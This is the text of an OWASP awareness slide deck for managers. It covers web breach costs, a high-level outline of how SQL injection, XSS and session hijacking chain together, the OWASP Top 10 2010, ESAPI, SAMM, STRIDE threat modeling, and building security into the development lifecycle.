Security for Managers and Executives OWASP Education Computer based training Security for Managers and Executives Nishi Kumar IT Architect Specialist, FIS Chair, Software Security Forum at FIS OWASP CBT Project Lead OWASP Global Industry Committee Nishi.Kumar@owasp.org Contributor and Reviewer Keith Turpin

Objectives Things we can do that will help build secure applications Bring application security awareness Things we can do that will help build secure applications Processes we can have for achieving this goal Answer some common questions

How would you feel if your confidential data is stolen? Angry! Frustrated!

Identity Theft Phishing

Facebook Phishing Attack Lures people to a fake Facebook page and prompts them to log in. Unsuspecting Facebook users get a message from a friend urging them to "check this out" and including a link to a Web page that appears to be a Facebook log-in page.

customer data, 77 Million compromised. (potentially CCs as well)

Why Should We Care? Let’s just think this through… How likely is a successful web application attack? Stunningly prevalent Easy to exploit without special tools or knowledge Little chance of being detected Hundreds of thousands of developers, tiny fraction with security Consequences? Corruption or disclosure of database contents Root access to web and application servers Loss of authentication and access control for users Defacement Secondary attacks from your application

Cost of Non-Compliance In the event of the a breach the acquirer CAN make the merchant responsible for: Any fines from PCI-Co Up to $500,000 per incident Cost to notify victims Cost to replace cards (about $10/card) Cost for any fraudulent transactions Forensics from a QDSC Level 1 certification from a QDSC The QDSC (Qualified Data Security Company certification) by Visa© authorizes a company to perform level-one onsite assessments for merchants and service providers requiring a "Report on Compliance" (ROC).

Cost of Non-Compliance (Cont) Example: 50,000 credit cards stolen PCI Penalty - $100,000 per incident $500,000 if you do not have a self-assessment Card Replacement - $500,000 (50,000 x $10 dollars per card) Fraudulent Transaction – $61,750,000 ($1,235 x 50,000) $1,235 - 2004 average fraudulent transaction Bad Publicity – Priceless!

Why Web Application Security important? Attacks Shift Towards Application Layer Security Spending % of Attacks % of Dollars 10% Web Applications 75% 90% Network Server 25% 2/3 of All Web Applications Are Vulnerable Sources: Gartner, Watchfire

Problem Illustrated Application Layer Network Layer Attacker sends attacks inside valid HTTP requests Your custom code is tricked into doing something it should not Security requires software development expertise, not signatures Network Layer Firewall, hardening, patching, IDS, and SSL cannot detect or stop attacks inside HTTP requests. Security relies on signature databases Application Layer Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce Bus. Functions Databases Legacy Systems Web Services Directories Human Resrcs Billing I wanted to illustrate here visually how the attack is happening. Attackers send an attack inside valid Http Request. Application code is tricked in doing something it was not supposed to do. Full application security requires specific software development expertise. Network layer security alone cannot stop attacks inside Http Request. APPLICATION ATTACK Custom Code App Server Web Server Hardened OS Network Layer Firewall Firewall Insider

Demo Attack Phases of hacker attacks

Phase 1 Information search Fingerprinting 1. Hacker searches information about victim’s target system Operating System Web Server Database 2. Compares information with vulnerability database

Phase 1 - Information Search SQL Injection 1. Hacker found vulnerability Search for (specific) user Find additional information about user 2. Needs information for next phase of attack

Phase 2 - Infrastructure Cross Site Scripting (XSS) 1. Hacker found personal information about user e-mail Phone number … 2. Sends e-mail with unsuspicious topic 3. Includes XSS in e-Mail that sends user session to the hackers server

Phase 2 - Infrastructure Cross Site Scripting (XSS) 1. User receives e-Mail 2. e-mail is unsuspicious to user Topic Originator 3. Included XSS sends all cookies to hacker’s web site

Phase 3 - Exploit Session hijacking 1. Hacker received all cookies from user 2. Cookies are used to identify users 3. Hacker uses cookie to resume user session 4. Hacker is logged in as user “victim” with user’s access rights

That was just the beginning

Demo Cross-site scripting Xss-Proxy XSS-Proxy is a tool for leveraging Cross-Site-Scripting (XSS) flaws to hijack victim browsers and allows a bi-directional interactive control channel between attacker, victim browser and an XSS vulnerable site. Web Goat XSS

Leverage OWASP for Web Application Security Training The Open Web Application Security Project (OWASP Foundation Inc.) Participation in OWASP is free and open to all The vision is a software market that produces code that’s secure.  The mission is to make security visible so that software buyers and sellers are on equal footing and market forces can work.  International not-for-profit charitable organization funded primarily by volunteers time and OWASP Memberships http://www.owasp.org

What are the Top 10 Vulnerabilities? OWASP Top 10

Common Security Issues: The OWASP Top 10 2010 The Ten Most Critical Risk Aimed to educate developers, architects and security practitioners about the consequences of the most common web application security risk Living document: 20010 Top10 different from 2007 T10

Users and Adopters Payment Card Industry (PCI) PCI DSS - Requirements 6.5 OWASP Guide (OWASP Top 10) PA-DSS - Requirements 5.2 is OWASP Guide (OWASP Top 10) Security code review for all the custom code. OWASP Supporters

Educational Supporters

Common Security Issues: The OWASP Top 10 2010

Security Threats and OWASP T10 Phishing Exploit weak authentication, authorization, session management and input validation (XSS, XFS) vulnerabilities Privacy violations Exploit poor input validation, business rule and weak authorization, injection flaws, information leakage vulnerabilities Identity theft Exploit poor or non-existent cryptographic controls, malicious file execution, authentication, business rule and auth checks vulnerabilities

Security Threats and OWASP T10 (cont) System compromise, data alteration or data destruction Exploit injection flaws, remote file inclusion-upload vulnerabilities Financial loss Exploit unauthorized transactions and CSRF attacks, broken authentication and session management, insecure object reference, weak authorization-forceful browsing vulnerabilities Reputation loss Depend on any evidence (not necessarily exploitation) of a web application vulnerability

OWASP ESAPI (Enterprise Security API) Custom Enterprise Web Application OWASP Enterprise Security API Authenticator User AccessController AccessReferenceMap Validator Encoder HTTPUtilities Encryptor EncryptedProperties Randomizer Exception Handling Logger IntrusionDetector SecurityConfiguration Your Existing Enterprise Services or Libraries ESAPI Homepage: http://www.owasp.org/index.php/ESAPI

OWASP ESAPI 2.0 & OWASP Top 10 for 2010 mapping A1: Injection Encoder A2: Cross-Site Scripting (XSS) Here is the mapping for OWASP Top 10 for 2010 and ESAPI 2.0 Encoder, Validator A3: Broken Authentication and Session Management Authenticator, User, HTTPUtilities A4: Insecure Direct Object References AccessReferenceMap, AccessController A5: Cross-Site Request Forgery (CSRF) User (CSRF Token) A6: Security Misconfiguration Security Configuration A7: Insecure Cryptographic Storage Encryptor A8: Failure to Restrict URL Access AccessController A9: Insufficient Transport Layer Protection HTTPUtilities A10: Unvalidated Redirects and Forwards AccessController

OWASP Documentation on Web Application Security Application Security Desk Reference (ASDR) Basic reference material on application security terminology Developer Guide Comprehensive guide for Web applications and Web services security Secure Coding Practices Quick Reference Guide for secure coding practices Code Review Guide Comprehensive secure code review guide on the web Testing Guide Web Application penetration testing ASVS Application Security Verification Standard Secure Coding Practices ASVS Testing Guide Developer Guide Code Review Guide Application Security Desk Reference (ASDR)

OWASP Tools and Technology Automated Security Verification Vulnerability Scanners Static Analysis Tools Fuzzing Manual Security Verification Penetration Testing Tools Code Review Tools Security Architecture ESAPI Secure Coding AppSec Libraries ESAPI Reference Implementation Guards and Filters AppSec Management Reporting Tools AppSec Education CBT(Computer based training) Flawed Apps Learning Environments Live CD

Web Testing Environment (Live CD) Project that collects some of the best open source security projects in a single environment Users can boot from Live CD and immediately start using all tools without any configuration http://www.owasp.org/index.php/LiveCD

Web Testing Environment (Live CD) Burpsuite 1.3.03 Cal9000 2.0 Ende 1.0rc3 Fierce 1.0.3 Firefox 3.6 Grendel-scan 1.0 Httprint 301 Jbrofuzz 2.4 Maltego 3.0 Metasploit 3.5.1 Netcat 0.7.1 Nikto 2.1.2 Nmap 5.00 Paros 3.2.13 Ratproxy 1.58 Spikeproxy 1.4.8 Sqlbrute 1.0 Sqlmap 0.8 Tcpdump 4.0.0 w3af-svn 4041 wapiti 2.2.1-1 Webgoat 5.3-RC1 Webscarab 20090122 Webslayer-svn r4 Wireshark 1.2.7 Wsfuzzer 1.9.4 Zap 1.2.0 These are the list of tools that comes in Live CD

Secure Coding Practices The Secure Coding Practices Quick Reference Guide is a technology agnostic set of general software security coding practices, in a comprehensive checklist format, that can be integrated into the development lifecycle. It is designed to serve as a secure coding kick-start tool and easy reference, to help development teams quickly understand secure coding practices. The Secure Coding Practices Quick Reference Guide is a technology agnostic set of general software security coding practices, in a comprehensive checklist format, that can be integrated into the development lifecycle. It is designed to serve as a secure coding kick-start tool and easy reference, to help development teams quickly understand secure coding practices.

Training and Education OWASP Education project: https://www.owasp.org/index.php/Category:OWASP_Ed ucation_Project OWASP Project and resources you can use: https://www.owasp.org/index.php/London/Training/OWA SP_projects_and_resources_you_can_use_TODAY

Training and Education(cont) OWASP CBT Project: https://www.owasp.org/index.php/Category: OWASP_CBT_Project

Web Goat A classic vulnerable application to teach developers security code flaws

WebScarab – A Proxy Engine A Proxy tool to intercept Http Request and Http Response

Software Assurance Maturity Model (SAMM) The four Disciplines are high-level categories for activities Three security Functions under each Discipline are the specific silos for improvement within an organization  Alignment & Governance Governance is centered on the processes and activities on how an organization manages overall software development activities. This includes cross cutting concerns on development and processes on organization level. Education & Guidance Involves increasing security knowledge amongst personnel in software development through training and guidance on security topics relevant to individual job functions. Standards and Compliance Involves setting up a security and compliance control and audit framework throughout an organization to achieve increased assurance in software under construction and in operation. Strategic Planning: Involves the overall strategic direction of the software assurance program and instrumentation of processes and activities to collect metrics about an organization’s security posture.   Requirements & Design In general, this will include product management, requirements gathering, high-level architecture specification, detailed design, and implementation. Threat Modeling: involves accurately identifying and characterizing potential attacks on a software in order to better understand the risks and facilitate risk management. Security Requirements: Security Requirements involves promoting the inclusion of security-related requirements during the software development process in order to specify correct functionality from inception. Defensive Design: Secure Architecture involves bolstering the design process with activities to promote secure-by-default designs and control over technologies and frameworks upon which software is built. Verification & Assessment It is focused on the processes and activities how we check and test artifacts produced throughout software development. This typically includes quality assurance work such as testing, but it can also include other review and evaluation activities. Architecture Review: Design Review involves inspection of the artifacts created from the design process to ensure provision of adequate security mechanisms Code Review: involves assessment of source code to aid vulnerability discovery and related mitigation activities as well as establish a baseline for secure coding expectations. Security Testing: involves testing software in its runtime environment in order to both discover vulnerabilities and establish a minimum standard for software releases. Deployment & Operations Involves release management. This can involve shipping products to end users, deploying products to internal or external hosts, and normal operations of software in the runtime environment. Vulnerability Management: involves establishing consistent processes for managing internal and external vulnerability reports to limit exposure and gather data to enhance the security assurance program. Environment Hardening involves implementing controls for the operating environment like web server and application server hardening. Operational Enablement involves identifying and capturing security-relevant information needed by an operator to properly configure, deploy, and run a software. Alignment & Governance Requirements & Design Verification & Assessment Deployment & Operations Disciplines Functions

Software Assurance Maturity Model (SAMM) Check out this one...

SAMM Conducting assessments SAMM includes assessment worksheets for each Security Practice

SAMM Creating Scorecards Gap analysis Capturing scores from detailed assessments versus expected performance levels Demonstrating improvement Capturing scores from before and after an iteration of assurance program build-out Ongoing measurement Capturing scores over consistent time frames for an assurance program that is already in place

Process perspective: Build Security in the SDLC

Threat Modeling-An approach for analyzing the security

Threat Categorization - Stride Threats can be systematically identified in the application in a structured and repeatable manner Spoofing Tampering Repudiation Information disclosure Denial of service Elevation of privilege

Threat Categorization (cont) Types Examples Security Control Spoofing Illegally access and use another user's credentials Authentication Tampering Maliciously change/modify persistent data, such as data in a database Integrity Repudiation Perform illegal operations that lacks the ability to trace Non-Repudiation Information disclosure Read a file that one was not granted access to, or read data in transit Confidentiality Denial of service Deny access to valid users, such as making a web server temporarily unavailable or unusable Availability Elevation of privilege Gain unauthorized access or compromise a system Authorization

??? Since no customer is complaining, why an organization needs to fix security vulnerabilities in their applications? Compliance In case of security breech Fines Reputation Loss - Priceless

??? What do we do if application is already in production and it has missed that phase of security? It's never too late and never too early. It is a continuous process... Penetration testing and security code review is the key. We must fix security leaks and vulnerabilities.

??? Security Code Review Value of mentoring is enormous What will help? Leverage OWASP Security Code Review Value of mentoring is enormous Application scanning and code scanning using static analysis tools Web application security part of the SDLC process Secure code development training Train QA to find security issues in the application

Make Security part of the SDLC process